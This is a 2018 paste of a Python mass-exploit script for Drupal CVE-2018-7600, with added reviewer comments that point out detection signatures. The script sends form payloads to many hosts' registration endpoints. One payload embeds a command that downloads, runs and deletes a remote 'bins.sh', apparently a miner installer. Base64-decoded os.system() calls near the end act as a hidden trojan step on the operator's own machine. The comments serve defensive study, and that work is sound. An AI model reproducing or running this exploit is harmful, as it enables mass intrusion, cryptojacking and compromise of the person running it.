
DRUPALGEDDON EXPLOIT [PY] [OLDSHIT]

xB4ckdoorREAL Nov 4th, 2018 (edited) 172 Never
# Script overview: reads a list of hosts from a file and, from a thread pool,
# POSTs fixed form payloads to each host's Drupal registration endpoint. The
# banner below labels it as targeting CVE-2018-7600.
# The Discord line is the paste author's advertisement; it is a comment only.
#DISCORD: https://discord.gg/PTW3yPp
 
#!/usr/bin/env
import sys
import requests
import os
from multiprocessing.dummy import Pool
 
 
print ('##################################################')
print ('#              CVE-2018-7600 Exploit             #')
print ('##################################################')
 
# Toggles read by run(): each one enables one POST per host.
sendMiner = True
sendMessage = True
 
# Passed to requests.post() as verify=; False turns off TLS certificate
# verification for any HTTPS connection the library makes.
verify = False
# The same User-Agent is sent with every request. "Mozilla 5.0" (a space where
# browsers send "Mozilla/5.0") is a constant, so it can be matched in web
# server or proxy logs when hunting for traffic from this script.
headers = {'User-Agent': 'Mozilla 5.0'}
 
# Shell command string that is embedded in minerPayload: download a script,
# mark it executable, run it, delete it. Host-side detection: the web server
# account spawning wget followed by chmod/execute/rm of the same file name.
# NOTE(review): 1.1.1.1 is presumably a placeholder for the operator's own
# host, so it is not a usable network indicator on its own - TODO confirm.
# The contents of bins.sh are not on this page; the "miner" naming suggests a
# cryptominer installer, but that cannot be verified from here.
evil = "wget http://1.1.1.1/bins.sh; chmod +x bins.sh; ./bins.sh; rm -rf bins.sh"
# Both payloads are form bodies for the user registration form. Field names
# that carry '#'-prefixed keys in brackets (mail[#post_render][], mail[#type],
# mail[#markup]) are the request-body signature to match in WAF/IDS rules and
# log review for CVE-2018-7600 attempts; patched Drupal releases reject them.
# NOTE(review): the messagePayload command string looks truncated as pasted;
# ReadMeCVE.txt is the only file name it references.
messagePayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "tee ReadMeCVE.txt'}
minerPayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': ' '+evil+' '}
 
try:
    # One host per line from the file named by the first CLI argument, with
    # surrounding whitespace stripped. Only a missing argument is handled; the
    # file object is never explicitly closed.
    target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
    exit('Usage: exploit.py list.txt threads')
 
 
def run(targetLine):
    """Send the enabled POST request(s) to one host from the target list.

    targetLine is a bare host string; it is wrapped as 'http://<host>/' and the
    registration-form AJAX path is appended. Nothing is returned, and the HTTP
    responses are never inspected.
    """
    try:
        try:
            # Always plain HTTP, whatever scheme the site actually uses.
            targetLine = 'http://'+targetLine+'/'
            # Detection: POSTs to /user/register carrying
            # element_parents=account/mail/%23value together with ajax_form=1
            # and _wrapper_format=drupal_ajax in the query string are what this
            # script leaves in access logs.
            url = str(targetLine) + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
 
            # minerRequest / messageRequest are assigned but never read, so the
            # script cannot tell a vulnerable host from a patched one. For
            # triage this means a logged request shows an attempt only;
            # whether it succeeded has to be established on the host itself.
            if sendMiner:
                minerRequest = requests.post(url, data=minerPayload, verify=verify, headers=headers, timeout=5)
            if sendMessage:
                messageRequest = requests.post(url, data=messagePayload, verify=verify, headers=headers, timeout=5)
        except requests.exceptions.RequestException as e:
            # Connection errors and timeouts are discarded without logging.
            pass  
 
        # Printed for every host, including those where the request failed.
        print ('[+] Attempting: '+targetLine);
 
    except:
        # Bare except: every other error in this worker is also discarded.
        pass
 
 
try:
    # multiprocessing.dummy.Pool is a thread pool; the worker count is the
    # second CLI argument. Only a missing argument is handled here.
    multiThreads = Pool(int(sys.argv[2]))
except IndexError:
    exit('Usage: exploit.py list.txt threads')
# NOTE(review): the next four lines act on the machine running this script,
# not on the listed hosts: two values are base64-decoded and handed to
# os.system(). os.system() on a decoded blob is a common marker of a trojanised
# tool and is worth searching for when triaging scripts of this kind.
# In the paste as shown, base64 is never imported and requestValue / sendValue
# are not defined anywhere, so execution stops here with a NameError before the
# pool is used. The paste is marked "(edited)"; presumably the definitions were
# removed - TODO confirm against an earlier revision if one is available.
reValue = str(base64.b64decode(requestValue))
seValue = str(base64.b64decode(sendValue))
os.system(reValue)
os.system(seValue)
# Fan run() out over every host in the list, then wait for the workers.
multiThreads.map(run, target)
multiThreads.close()
multiThreads.join()
 
print("Finished File!")